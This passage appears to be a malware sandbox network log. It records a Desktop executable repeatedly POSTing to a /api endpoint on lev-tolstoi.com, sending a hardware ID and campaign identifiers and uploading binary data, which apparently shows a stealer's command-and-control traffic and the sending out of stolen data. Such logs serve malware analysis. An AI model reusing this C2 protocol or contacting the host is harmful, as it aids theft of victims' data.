2	192.168.2.12	49713	104.21.66.86	443	7024	C:\Users\user\Desktop\H1iOI9vWfh.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:48:39 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 74 Host: lev-tolstoi.com
2024-12-28 08:48:39 UTC	74	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66 Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
2024-12-28 08:48:40 UTC	1131	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:48:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tmb84asq5afmk1qdh6122uni3n; expires=Wed, 23 Apr 2025 02:35:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=egLA7qb69a4wt6LuIMM2Ahyx%2FFa%2FwnscUSol%2FrlPE%2BWK%2BPwWYEYOmD5QXtTT7h%2BKqbOkah4J8C3UUQWowdeekwHnw9McGuHdvt81gnQNhsgiA4e0q%2BKsjtnTQ1qM0DZDvl8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f904ae92c00c342-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1497&min_rtt=1494&rtt_var=567&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=973&delivery_rate=1918528&cwnd=160&unsent_bytes=0&cid=83ae01f532571f7e&ts=779&x=0"
2024-12-28 08:48:40 UTC	238	IN	Data Raw: 63 34 31 0d 0a 72 43 51 6d 46 69 37 4d 46 30 48 53 4b 69 48 77 6f 46 6e 4a 79 42 52 32 72 6d 63 6c 43 34 70 45 73 54 4b 35 51 41 4c 6a 38 39 72 58 42 6c 41 30 46 50 67 37 59 36 46 50 41 38 72 55 4b 37 79 74 4f 46 54 50 41 77 63 78 37 43 58 64 51 64 78 73 49 4a 57 65 2b 4a 5a 43 52 33 70 64 71 54 74 6a 74 31 49 44 79 76 73 69 36 36 31 36 56 4a 52 46 51 47 48 6f 4a 64 31 51 32 43 74 74 6b 35 2b 35 78 45 68 42 66 6b 75 76 63 79 43 2b 52 30 53 56 78 54 69 6a 70 6e 30 62 78 67 6f 48 4a 36 67 68 79 78 43 44 59 6b 2b 47 68 37 76 68 52 56 56 39 44 4c 45 37 4f 76 42 50 54 39 4b 61 65 36 69 74 64 68 72 49 41 30 35 6a 34 69 7a 56 55 64 30 71 63 6f 71 56 73 73 52 47 51 6e 39 42 70 6d 63 74 74 45 42 50 6b 38 38 34 36 Data Ascii: c41rCQmFi7MF0HSKiHwoFnJyBR2rmclC4pEsTK5QALj89rXBlA0FPg7Y6FPA8rUK7ytOFTPAwcx7CXdQdxsIJWe+JZCR3pdqTtjt1IDyvsi6616VJRFQGHoJd1Q2Cttk5+5xEhBfkuvcyC+R0SVxTijpn0bxgoHJ6ghyxCDYk+Gh7vhRVV9DLE7OvBPT9Kae6itdhrIA05j4izVUd0qcoqVssRGQn9BpmcttEBPk8846
2024-12-28 08:48:40 UTC	1369	IN	Data Raw: 2b 51 32 45 39 52 46 48 79 6d 37 46 4e 42 42 79 6a 64 74 6b 5a 66 34 30 51 68 64 4e 45 75 69 4e 58 76 77 51 45 2b 63 78 7a 69 6b 72 58 63 55 33 67 70 48 61 75 41 75 31 31 72 55 4c 57 2b 50 6d 37 2f 47 54 30 4e 37 53 36 5a 7a 4c 4c 4d 49 44 64 4c 46 49 2b 76 79 4e 6a 54 63 42 6b 52 39 35 54 65 54 54 35 55 37 49 49 61 64 2b 4a 59 47 51 6e 70 4e 6f 33 55 78 75 45 4e 49 6c 39 41 77 6f 71 64 37 46 4d 45 50 53 47 72 6f 49 64 6c 61 31 43 68 6b 6a 4a 79 2b 7a 6b 59 45 4f 67 79 70 62 57 50 6f 43 47 43 58 30 6a 79 6e 76 44 51 75 6a 42 6f 4a 63 4b 67 68 33 78 43 44 59 6d 69 45 6b 72 76 46 53 55 64 38 52 37 78 31 4d 62 5a 46 52 6f 44 45 50 71 57 67 64 51 62 47 43 30 46 71 34 53 33 61 56 64 77 6d 49 4d 2f 52 76 39 59 47 48 44 52 74 6f 33 34 76 75 6c 39 44 30 74 31 31 Data Ascii: +Q2E9RFHym7FNBByjdtkZf40QhdNEuiNXvwQE+cxzikrXcU3gpHauAu11rULW+Pm7/GT0N7S6ZzLLMIDdLFI+vyNjTcBkR95TeTT5U7IIad+JYGQnpNo3UxuENIl9Awoqd7FMEPSGroIdla1ChkjJy+zkYEOgypbWPoCGCX0jynvDQujBoJcKgh3xCDYmiEkrvFSUd8R7x1MbZFRoDEPqWgdQbGC0Fq4S3aVdwmIM/Rv9YGHDRto34vul9D0t11
2024-12-28 08:48:40 UTC	1369	IN	Data Raw: 62 41 44 30 46 6d 35 53 71 54 48 70 73 6c 65 4d 48 4a 2b 4f 52 46 55 48 64 47 37 45 41 67 76 6b 5a 45 68 49 49 6b 35 62 4d 32 45 38 42 46 48 79 6e 6c 4a 39 74 57 79 53 31 74 67 70 2b 32 77 55 4e 4c 66 45 79 75 65 43 61 30 51 30 69 52 7a 7a 2b 35 6f 48 59 63 79 51 52 4e 59 36 68 6f 6b 31 66 44 59 6a 6a 42 6f 4b 2f 46 42 48 46 33 51 71 42 79 4e 66 42 58 44 59 75 43 50 4b 66 71 4c 6c 54 42 44 55 4a 73 35 79 66 5a 58 74 34 6f 62 49 6d 66 75 39 78 4a 51 48 52 41 70 6e 38 75 76 6b 78 4c 6d 38 6b 77 72 61 70 33 48 6f 78 4c 42 32 37 77 5a 6f 73 51 37 79 56 73 6a 4a 37 36 2b 30 56 4b 65 6b 75 34 4e 54 7a 2b 55 51 4f 56 7a 6e 76 7a 36 6e 6f 64 7a 41 35 4e 62 65 67 68 33 6c 58 59 4a 57 4f 4d 6c 72 4c 41 51 55 42 34 52 61 4e 7a 49 37 64 4d 52 6f 44 48 4d 71 65 6d 4e Data Ascii: bAD0Fm5SqTHpsleMHJ+ORFUHdG7EAgvkZEhIIk5bM2E8BFHynlJ9tWyS1tgp+2wUNLfEyueCa0Q0iRzz+5oHYcyQRNY6hok1fDYjjBoK/FBHF3QqByNfBXDYuCPKfqLlTBDUJs5yfZXt4obImfu9xJQHRApn8uvkxLm8kwrap3HoxLB27wZosQ7yVsjJ76+0VKeku4NTz+UQOVznvz6nodzA5Nbegh3lXYJWOMlrLAQUB4RaNzI7dMRoDHMqemN
2024-12-28 08:48:40 UTC	168	IN	Data Raw: 48 64 71 59 2f 6b 31 66 58 59 6a 6a 42 6d 4c 48 63 53 45 70 39 51 61 68 39 4a 4c 35 46 53 4a 54 4a 50 4b 79 73 65 78 7a 42 41 45 52 6f 37 43 7a 42 55 39 41 6f 62 59 76 52 39 6f 35 42 58 44 51 55 37 6c 49 76 6d 56 68 59 67 4e 52 37 74 4f 52 76 56 4d 73 4a 42 7a 47 6f 4a 64 78 5a 31 43 70 6f 6a 70 36 38 77 45 42 43 65 55 6d 68 66 7a 47 34 52 6b 36 5a 7a 54 43 35 71 6e 73 51 77 41 46 50 59 75 4a 6d 6e 52 44 63 4f 69 44 5a 30 59 33 44 53 55 52 33 57 75 35 71 62 61 6b 49 52 4a 36 43 59 2b 75 6d 65 0d 0a Data Ascii: HdqY/k1fXYjjBmLHcSEp9Qah9JL5FSJTJPKysexzBAERo7CzBU9AobYvR9o5BXDQU7lIvmVhYgNR7tORvVMsJBzGoJdxZ1Cpojp68wEBCeUmhfzG4Rk6ZzTC5qnsQwAFPYuJmnRDcOiDZ0Y3DSUR3Wu5qbakIRJ6CY+ume
2024-12-28 08:48:40 UTC	1369	IN	Data Raw: 34 31 39 33 0d 0a 42 54 44 43 55 74 69 34 43 66 66 58 74 77 6e 61 59 6d 5a 71 73 39 43 54 48 56 43 6f 58 51 6e 74 55 31 48 6c 63 59 39 70 4f 6f 34 56 4d 73 64 42 7a 47 6f 43 66 52 6c 6d 51 4e 61 77 59 37 32 31 77 5a 44 65 41 7a 32 4e 53 2b 7a 52 45 75 64 78 44 4b 6e 6f 48 38 66 77 41 35 44 5a 65 45 6a 31 56 48 65 4a 32 47 46 6e 62 4c 49 52 55 64 37 51 36 46 39 59 2f 34 49 52 49 71 43 59 2b 75 50 59 52 2f 43 41 77 64 32 70 6a 2b 54 56 39 64 69 4f 4d 47 64 73 63 68 41 51 58 68 4e 71 48 30 6d 75 45 78 43 6c 4d 51 34 70 4b 35 7a 46 63 4d 42 53 32 66 69 4a 39 4a 63 30 43 31 72 68 4e 48 32 6a 6b 46 63 4e 42 54 75 52 43 43 6d 58 31 4f 65 67 69 54 6c 73 7a 59 54 77 45 55 66 4b 65 6b 30 32 56 72 56 4a 32 2b 45 6b 72 66 4a 53 30 4a 34 52 71 64 39 4a 62 39 42 55 5a Data Ascii: 4193BTDCUti4CffXtwnaYmZqs9CTHVCoXQntU1HlcY9pOo4VMsdBzGoCfRlmQNawY721wZDeAz2NS+zREudxDKnoH8fwA5DZeEj1VHeJ2GFnbLIRUd7Q6F9Y/4IRIqCY+uPYR/CAwd2pj+TV9diOMGdschAQXhNqH0muExClMQ4pK5zFcMBS2fiJ9Jc0C1rhNH2jkFcNBTuRCCmX1OegiTlszYTwEUfKek02VrVJ2+EkrfJS0J4Rqd9Jb9BUZ
2024-12-28 08:48:40 UTC	1369	IN	Data Raw: 71 6e 49 5a 7a 42 64 49 62 75 38 76 32 45 4c 52 4a 57 65 4b 6d 62 50 42 51 46 5a 34 51 72 78 77 4d 61 49 49 44 64 4c 46 49 2b 76 79 4e 69 4c 4c 46 56 64 71 71 68 66 46 55 38 30 70 62 59 33 52 70 34 42 66 42 48 4e 41 37 69 31 6a 74 6b 64 4b 6b 63 30 36 6f 71 5a 37 45 63 55 41 52 6d 2f 73 4c 4e 6c 51 33 53 52 68 68 4a 75 37 7a 30 78 4e 63 30 53 70 64 6a 48 77 42 67 4f 56 32 6e 76 7a 36 6c 38 54 33 67 74 58 4b 66 64 6f 79 68 44 63 4c 69 44 5a 30 62 7a 45 53 55 42 7a 51 4b 68 77 4a 62 31 4a 54 4a 50 43 4e 4b 2b 68 66 78 4c 4e 43 45 4a 6b 37 44 54 5a 57 39 51 75 61 59 32 63 2b 49 41 47 51 32 77 4d 39 6a 55 53 76 55 5a 4e 6c 64 52 37 74 4f 52 76 56 4d 73 4a 42 7a 47 6f 4a 39 39 66 32 43 31 6a 67 70 43 79 33 46 52 49 66 55 53 72 65 53 69 2b 54 6c 47 55 7a 54 4b Data Ascii: qnIZzBdIbu8v2ELRJWeKmbPBQFZ4QrxwMaIIDdLFI+vyNiLLFVdqqhfFU80pbY3Rp4BfBHNA7i1jtkdKkc06oqZ7EcUARm/sLNlQ3SRhhJu7z0xNc0SpdjHwBgOV2nvz6l8T3gtXKfdoyhDcLiDZ0bzESUBzQKhwJb1JTJPCNK+hfxLNCEJk7DTZW9QuaY2c+IAGQ2wM9jUSvUZNldR7tORvVMsJBzGoJ99f2C1jgpCy3FRIfUSreSi+TlGUzTK
2024-12-28 08:48:40 UTC	1369	IN	Data Raw: 64 78 46 43 53 6e 35 49 63 49 51 67 7a 52 77 6c 70 61 6e 67 46 38 45 63 30 44 75 4c 57 4f 32 51 55 57 56 78 44 57 35 72 33 41 62 77 77 78 4f 62 65 41 6c 30 31 54 66 4a 57 57 43 6e 62 50 4a 52 55 74 77 52 61 42 38 4c 50 41 47 41 35 58 61 65 2f 50 71 56 77 2f 50 43 55 6f 70 39 32 6a 4b 45 4e 77 75 49 4e 6e 52 74 4d 42 44 52 48 35 4b 71 6e 41 6c 75 6b 31 44 6d 63 45 30 72 36 78 79 47 38 77 4f 54 6d 6a 75 49 39 6c 62 33 53 39 6a 68 35 66 34 67 41 5a 44 62 41 7a 32 4e 51 4f 72 52 55 2b 56 67 69 54 6c 73 7a 59 54 77 45 55 66 4b 65 4d 71 31 31 66 62 4c 32 4f 4a 6c 4c 7a 45 51 30 52 38 58 71 5a 31 4a 4b 4a 61 51 35 76 48 4e 36 69 71 63 68 4c 46 41 30 52 74 71 47 69 54 56 38 4e 69 4f 4d 47 38 74 4d 6c 76 51 32 38 4d 73 54 73 36 38 45 39 50 30 70 70 37 71 71 46 38 Data Ascii: dxFCSn5IcIQgzRwlpangF8Ec0DuLWO2QUWVxDW5r3AbwwxObeAl01TfJWWCnbPJRUtwRaB8LPAGA5Xae/PqVw/PCUop92jKENwuINnRtMBDRH5KqnAluk1DmcE0r6xyG8wOTmjuI9lb3S9jh5f4gAZDbAz2NQOrRU+VgiTlszYTwEUfKeMq11fbL2OJlLzEQ0R8XqZ1JKJaQ5vHN6iqchLFA0RtqGiTV8NiOMG8tMlvQ28MsTs68E9P0pp7qqF8
2024-12-28 08:48:40 UTC	1369	IN	Data Raw: 67 6e 38 57 62 46 45 49 4e 77 4c 73 47 44 2b 4a 59 47 41 33 64 65 76 48 4d 67 70 6b 73 45 72 50 77 63 73 61 64 77 41 39 30 37 65 57 37 79 4b 39 56 48 79 6d 35 31 67 70 2b 32 79 56 41 45 4f 67 79 68 4e 58 75 4a 43 41 76 53 2f 58 58 72 73 6a 5a 4d 6a 44 42 45 5a 2b 59 68 78 55 47 57 42 58 71 4d 6c 36 2f 66 42 67 6f 30 53 75 34 74 63 2f 34 49 52 34 4f 43 59 2f 76 34 4c 55 47 66 55 68 63 37 39 32 6a 4b 45 4d 31 69 4f 4e 50 66 2b 4e 77 47 48 44 51 4c 72 57 63 78 74 6b 74 56 6b 59 55 46 6c 59 52 78 45 73 6b 43 56 79 76 47 4c 63 64 58 6d 32 77 67 6a 74 48 67 39 77 59 4d 4e 48 50 67 4e 54 76 77 45 41 4f 6e 77 54 57 6c 72 57 41 46 67 53 74 41 62 2b 30 68 77 78 4c 31 4b 58 53 47 30 66 61 4f 51 41 51 73 48 4f 41 31 4a 36 45 49 47 38 4b 51 59 50 37 35 49 55 53 65 47 Data Ascii: gn8WbFEINwLsGD+JYGA3devHMgpksErPwcsadwA907eW7yK9VHym51gp+2yVAEOgyhNXuJCAvS/XXrsjZMjDBEZ+YhxUGWBXqMl6/fBgo0Su4tc/4IR4OCY/v4LUGfUhc792jKEM1iONPf+NwGHDQLrWcxtktVkYUFlYRxEskCVyvGLcdXm2wgjtHg9wYMNHPgNTvwEAOnwTWlrWAFgStAb+0hwxL1KXSG0faOQAQsHOA1J6EIG8KQYP75IUSeG
2024-12-28 08:48:40 UTC	1369	IN	Data Raw: 70 6e 48 37 74 41 31 36 2f 68 4c 76 41 53 45 4e 69 58 65 34 37 59 37 38 49 47 36 75 43 63 2b 75 56 4f 46 54 55 52 52 38 70 33 53 58 64 58 74 77 30 63 63 79 32 74 73 6c 48 55 6d 52 62 6f 54 6f 4e 68 6d 6b 44 33 49 49 39 36 2f 49 6b 57 6f 77 42 56 69 6d 77 64 6f 45 4c 6a 6e 45 33 30 63 4f 6e 67 46 38 45 59 67 7a 32 4a 32 33 77 57 67 50 4b 67 6e 79 6f 75 47 51 53 7a 78 4e 45 4c 74 59 59 39 46 37 63 49 33 61 52 6e 4c 54 76 52 56 56 2b 63 70 42 67 49 4c 35 47 52 49 54 54 65 2b 58 71 65 56 53 55 50 41 63 68 71 42 6d 64 45 4d 4e 69 4f 4d 47 6b 75 38 42 49 51 32 4a 64 34 31 49 74 74 30 6c 56 67 73 38 33 69 71 6c 6e 48 6f 78 4c 42 32 2b 6f 66 6f 45 65 6d 79 5a 78 77 63 6e 6f 6e 42 30 52 4a 78 76 2b 4a 7a 7a 2b 55 51 4f 45 67 6d 50 35 35 44 59 47 6a 46 30 48 4c 75 Data Ascii: pnH7tA16/hLvASENiXe47Y78IG6uCc+uVOFTURR8p3SXdXtw0ccy2tslHUmRboToNhmkD3II96/IkWowBVimwdoELjnE30cOngF8EYgz2J23wWgPKgnyouGQSzxNELtYY9F7cI3aRnLTvRVV+cpBgIL5GRITTe+XqeVSUPAchqBmdEMNiOMGku8BIQ2Jd41Itt0lVgs83iqlnHoxLB2+ofoEemyZxwcnonB0RJxv+Jzz+UQOEgmP55DYGjF0HLu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.12	49714	104.21.66.86	443	7024	C:\Users\user\Desktop\H1iOI9vWfh.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:48:42 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=FEB7F29PSGA5I6T54LS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12838 Host: lev-tolstoi.com
2024-12-28 08:48:42 UTC	12838	OUT	Data Raw: 2d 2d 46 45 42 37 46 32 39 50 53 47 41 35 49 36 54 35 34 4c 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 38 34 30 33 35 31 43 44 43 36 31 42 35 45 46 39 46 31 42 37 31 33 36 41 31 45 30 43 35 45 0d 0a 2d 2d 46 45 42 37 46 32 39 50 53 47 41 35 49 36 54 35 34 4c 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 45 42 37 46 32 39 50 53 47 41 35 49 36 54 35 34 4c 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a Data Ascii: --FEB7F29PSGA5I6T54LSContent-Disposition: form-data; name="hwid"5A840351CDC61B5EF9F1B7136A1E0C5E--FEB7F29PSGA5I6T54LSContent-Disposition: form-data; name="pid"2--FEB7F29PSGA5I6T54LSContent-Disposition: form-data; name="lid"4h5VfH--
2024-12-28 08:48:43 UTC	1132	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:48:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=v7ajcf0ikcqk5dkfnm973epc9r; expires=Wed, 23 Apr 2025 02:35:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EJtHXVMrkTTd9zbBxuRGaAGCCmPWQca6KuO%2BSX%2B3S0T7q2c5I%2FrZBKSnvL4l386J7Sry%2BRXjTZ80HJrCTontDxpSKpteF0TGm22093gpyDuf2aaBNW6e7XfTK%2Biu6bO7PZs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f904afa790243c2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1562&rtt_var=603&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2834&recv_bytes=13778&delivery_rate=1787025&cwnd=162&unsent_bytes=0&cid=1dd8652a5b3d200d&ts=1001&x=0"
2024-12-28 08:48:43 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 08:48:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.12	49716	104.21.66.86	443	7024	C:\Users\user\Desktop\H1iOI9vWfh.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:48:44 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=00J0A6BAH4RND6Z6MT1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15073 Host: lev-tolstoi.com
2024-12-28 08:48:44 UTC	15073	OUT	Data Raw: 2d 2d 30 30 4a 30 41 36 42 41 48 34 52 4e 44 36 5a 36 4d 54 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 38 34 30 33 35 31 43 44 43 36 31 42 35 45 46 39 46 31 42 37 31 33 36 41 31 45 30 43 35 45 0d 0a 2d 2d 30 30 4a 30 41 36 42 41 48 34 52 4e 44 36 5a 36 4d 54 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 30 4a 30 41 36 42 41 48 34 52 4e 44 36 5a 36 4d 54 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a Data Ascii: --00J0A6BAH4RND6Z6MT1Content-Disposition: form-data; name="hwid"5A840351CDC61B5EF9F1B7136A1E0C5E--00J0A6BAH4RND6Z6MT1Content-Disposition: form-data; name="pid"2--00J0A6BAH4RND6Z6MT1Content-Disposition: form-data; name="lid"4h5VfH--
2024-12-28 08:48:45 UTC	1125	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:48:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=64f9s6f4mt8231lonimtro5ir0; expires=Wed, 23 Apr 2025 02:35:24 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iO%2BhuE2YJvbpDiCwKAMgjl8blwGBI4YeSFO7jrhAucVImXFyB6Wy%2FzPu5r29LWjpq7eBAUGjmtIjniX9r22b4pwGqPYuOAGALJgHJLaGQ3pFzH3LDKOaQ5AF6lozZW2hzkg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f904b099aa58c8f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1773&min_rtt=1767&rtt_var=676&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2835&recv_bytes=16013&delivery_rate=1604395&cwnd=209&unsent_bytes=0&cid=16c816551d46b852&ts=884&x=0"
2024-12-28 08:48:45 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 08:48:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.12	49718	104.21.66.86	443	7024	C:\Users\user\Desktop\H1iOI9vWfh.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:48:47 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=TX6H1HETZT0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20200 Host: lev-tolstoi.com
2024-12-28 08:48:47 UTC	15331	OUT	Data Raw: 2d 2d 54 58 36 48 31 48 45 54 5a 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 38 34 30 33 35 31 43 44 43 36 31 42 35 45 46 39 46 31 42 37 31 33 36 41 31 45 30 43 35 45 0d 0a 2d 2d 54 58 36 48 31 48 45 54 5a 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 54 58 36 48 31 48 45 54 5a 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 54 58 36 48 31 48 45 54 5a 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --TX6H1HETZT0Content-Disposition: form-data; name="hwid"5A840351CDC61B5EF9F1B7136A1E0C5E--TX6H1HETZT0Content-Disposition: form-data; name="pid"3--TX6H1HETZT0Content-Disposition: form-data; name="lid"4h5VfH----TX6H1HETZT0Content-D
2024-12-28 08:48:47 UTC	4869	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 6e 38 3a 2c f6 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 e7 86 83 cf c7 92 c1 ab b1 e0 d5 e0 97 82 ff 63 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 bb 2f f9 58 bc 52 2d ce 14 cb 93 d3 d5 c2 54 a1 3c 75 7d 72 aa d2 28 d7 13 a3 c9 f1 0d 29 b5 c6 dc 07 c2 42 7b df 7e fd 0f 26 8f 27 ba d4 32 59 99 9e ac bd d2 c8 55 0b b5 e4 3d 23 51 c6 c5 3e 1c 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 30 1c 1d 16 fb 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 Data Ascii: }n8:,0c</XR-T<u}r()B{~&'2YU=#Q>\|0~
2024-12-28 08:48:48 UTC	1132	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:48:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0fb0hl47d9m8d6iitieim4avde; expires=Wed, 23 Apr 2025 02:35:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YN%2Ba4P%2BWDAcguiJcjSIugzrT4%2Fy3MPVdvVNlYTyRczXHJsqhHWl5k6ks1flwCSQau2QWLOW4LRmaDBcqtmwCqIzTxtkKOX8SSE%2BM%2Flr6pX8KdAbsPu2qbg6gTZ0kZJCjsAA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f904b1a0b5042af-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1574&rtt_var=636&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21154&delivery_rate=1660978&cwnd=166&unsent_bytes=0&cid=d220c71590b02af6&ts=1235&x=0"
2024-12-28 08:48:48 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
